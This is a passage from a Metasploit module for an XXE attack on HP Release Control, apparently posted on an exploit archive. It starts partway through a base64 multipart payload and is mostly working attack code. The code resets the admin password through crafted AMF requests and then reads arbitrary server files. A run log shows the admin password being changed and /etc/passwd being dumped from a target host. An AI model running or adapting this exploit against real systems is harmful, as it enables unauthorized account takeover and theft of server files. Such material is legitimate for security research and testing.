lcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjx4QXhpc1NvdXJjZT5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc1NvdXJjZT48eEF4aXNMYWJlbD5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc0xhYmVsPjx5QXhpc1NvdXJjZT5Db3VudDwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+Q291bnQ8L3lBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5MaW5lIExhYmVsPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPkFibm9ybWFsIENoYW5nZXM8L3Nlcmllc0xhYmVsPjwvTGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+TGluZUNoYXJ0PC90eXBlPjxuYW1lPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+T1VUQ09NRV9PVkVSX1RJTUVfREFUQV9TT1VSQ0U8L2lkPjxuYW1lPk91dGNvbWUgT3ZlciBUaW1lPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5GaWx0ZXI8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5GaWx0ZXI6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWUvPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0Pkdyb3VwIEJ5OjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlt3ZWVrXVtXZWVrXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48L0J1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48Y2hhcnRUaXRsZT5PdXRjb21lIE92ZXIgVGltZTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+Q29sb3I8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPlRvb2x0aXA8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+UGVyY2VudGFnZTwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+UGVyY2VudGFnZTwveUF4aXNMYWJlbD48c2VyaWVzU291cmNlPk91dGNvbWU8L3Nlcmllc1NvdXJjZT48c2VyaWVzTGFiZWw+T3V0Y29tZTwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+T3V0Y29tZSBPdmVyIFRpbWU8L25hbWU+PHV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjwvRXhwb3J0TGlzdD4NCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVwbGFjZVBvcnRsZXREZWZzIg0KDQpZDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NjI3MDc2NjcxNDgyNDUyMDYwNDY2NDk5OTI2DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Ii5yZXBsYWNlTW9kdWxlcyINCg0KWQ0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIudHJpYWwiDQoNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVuYW1lU3VmZml4Ig0KDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYtLQ==")

data = data.sub('/etc/passwd', datastore['FILEPATH'])

res = send_request_cgi({
'uri' => '/ccm/dashboard/app/migrator/ImportResult.jsp',#normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ImportResult.jsp?IS_WINDOID=Y'),
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=---------------------------14627076671482452060466499926',
'cookie' => cookie,
'data' => data.to_s
})

select(nil, nil, nil, 5)
post = {
'com.mercury.dashboard.arch.fieldtree.formForFieldtree.' => 'Y',
'.exportPortletDefsLabel' => '',
'.exportPortletDefsHidden' => '',
'.exportModulesLabel' => 'Release Control Default Module',
'.exportModulesHidden' => '[98304][Release Control Default Module]'
}

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ExportResult.jsp?ISWINDOID=Y'),
'method' => 'POST',
'data' => 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.=Y&.exportPortletDefsLabel=&.exportPortletDefsHidden=&.exportModulesLabel=Release+Control+Default+Module&.exportModulesHidden=%5B98304%5D%5BRelease+Control+Default+Module%5D',
'cookie' => cookie
})

doc = REXML::Document.new res.body

file = ''
doc.elements.each('/ExportList/Module/description') do |element|
file = element.text
end

print file
end

def change_admin_password(cookie, admin_id)
req = Rex::Text::decode_base64("AAMAAAAEAARudWxsAAMvMzD/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgY9dXBkYXRlVXNlcldvcmtzcGFjZUxhbmRpbmdQYWdlCQMBAwEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkDAQMGSURFMDdDODYxLTBBOUUtMTE2MC0xMzkyLUZEOEZBRkQ3REQ3QgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMx/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGM3VwZGF0ZUdlbmVyYWxVc2VyU2V0dGluZ3MJCwECBgtlbl9VUwYVRXRjL0dNVCsxMgMDAQEBCgdDZmxleC5tZXNzYWdpbmcuaW8uQXJyYXlDb2xsZWN0aW9uCQsBAgYkBiYDAwZJQTlCNUZBRkQtQzA0Ny0zMDcyLThDQUEtRkQ4RkFGRDc2OERCBQAAAAAAAAAABklERDZEMTNENS0yMTBDLTJEMDktMDBCOS1DNTRFRTc1NzQ1MjYGF3VzZXJTZXJ2aWNlAARudWxsAAMvMzL/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgYldXBkYXRlVXNlclBhc3N3b3JkCQUBBg8xNzY5NDcyBhFwYXNzdzByZAEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkFAQYkBiYGSUREQTlENDQ1LUNFNDgtQTFDMy00MjNBLUZEOEZBRkQ4OUUzRQUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMz/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGK3VwZGF0ZVVzZXJCdXNpbmVzc0NJcwkHAQYPMTc2OTQ3MgoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkBAQoJCQEBAQEBCgkJBwEGJAoICgwGSUU0QTk2NjU5LTQ4ODItOTc2Ny1DMzNBLUZEOEZBRkQ5NEZCQgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQo=")
password = Rex::Text::rand_text_alpha(8)
req = req.sub("\x0f1769472", "\x0d"+admin_id).sub("passw0rd", password)
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amf'),
'method' => 'POST',
'ctype' => 'application/x-amf',
'data' => req,
'cookie' => cookie
})

return password
end

def get_admin_id(cookie)
req = Rex::Text::decode_base64("AAMAAAABAARudWxsAAMvMjkAAAIPCgAAAAERCoETT2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlJlbW90aW5nTWVzc2FnZRNvcGVyYXRpb24Nc291cmNlCWJvZHkTbWVzc2FnZUlkE3RpbWVzdGFtcBFjbGllbnRJZBV0aW1lVG9MaXZlD2hlYWRlcnMXZGVzdGluYXRpb24GFXNlYXJjaFVzZXIBCREBCoFTVWNvbS5tZXJjdXJ5Lm9ueXguY2xpZW50LnNlcnZpY2VzLnZvLlVzZXJWTx91c2VyUGVybWlzc2lvbnMRcGFzc3dvcmQLZW1haWwRdXNlckFwcHMddXNlclNldHRpbmdzVk8TdXNlclJvbGVzHWxpbmVPZkJ1c2luZXNzEWxhc3ROYW1lDXVzZXJJRBNsb2dpbk5hbWUTZmlyc3ROYW1lFWJ1c2luZXNzSWQLbGFiZWwKB0NmbGV4Lm1lc3NhZ2luZy5pby5BcnJheUNvbGxlY3Rpb24JAQEBAQoJCQEBAQoJCQEBAQEBAQEBAQEGLAMJAQEEGQQBBAEGSThFNTBBNDUzLUQwRDMtMkVCNC1BNDkzLTAyMTM0RDdEM0E3NgQAAQQACgsBFURTRW5kcG9pbnQGG215LXNlY3VyZS1hbWYJRFNJZAZJRTg3MjYzOUQtOTkwRS0zOUI5LTA1MUMtMDlBOUM1RUJDQUUwAQYXdXNlclNlcnZpY2UK")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amfsecure'),
'method' => 'POST',
'ctype' => 'application/x-amf',
'data' => req,
'cookie' => cookie
})

begin
idx = res.body.index("admin admin")
idx = idx + "admin admin".length + 25 + 1 + 1
id = res.body[idx+1..idx+6]
return id
rescue
return nil
end
end
end

__END__

msf auxiliary(hp_release_control_xxe) > show options

Module options (auxiliary/gather/hp_release_control_xxe):

Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/passwd yes The filepath to read on the server
PASSWORD passw0rd yes The password to authenticate with
Proxies http:192.168.1.45:8080 no Use a proxy chain
RHOST 192.168.1.109 yes The target address
RPORT 8080 yes The target port
TARGETURI / yes Base directory path
USERNAME username yes The username to authenticate with
VHOST no HTTP server virtual host

msf auxiliary(hp_release_control_xxe) > run

[*] Authenticating
[*] Found admin id: 229376
[*] Changing admin's password...
[*] Changed admin password to: ZaDdExMx
[-] Auxiliary failed: RuntimeError Login failed:
[-] Call stack:
[-] /home/bperry/Projects/metasploit-framework/lib/msf/core/module.rb:745:in `fail_with'
[-] /home/bperry/Projects/metasploit-framework/modules/auxiliary/gather/hp_release_control_xxe.rb:108:in `run'
[*] Auxiliary module execution completed
msf auxiliary(hp_release_control_xxe) > run

[*] Authenticating
[*] Found admin id: 229376
[*] Changing admin's password...
[*] Changed admin password to: upvsoveu
[*] Exploiting XXE...
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
release-control:x:500:500::/opt/HP/rc:/bin/bash
rtkit:x:498:496:RealtimeKit:/proc:/sbin/nologin
pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
fdsa:x:501:501::/home/fdsa:/bin/bash
[*] Auxiliary module execution completed
msf auxiliary(hp_release_control_xxe) >
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close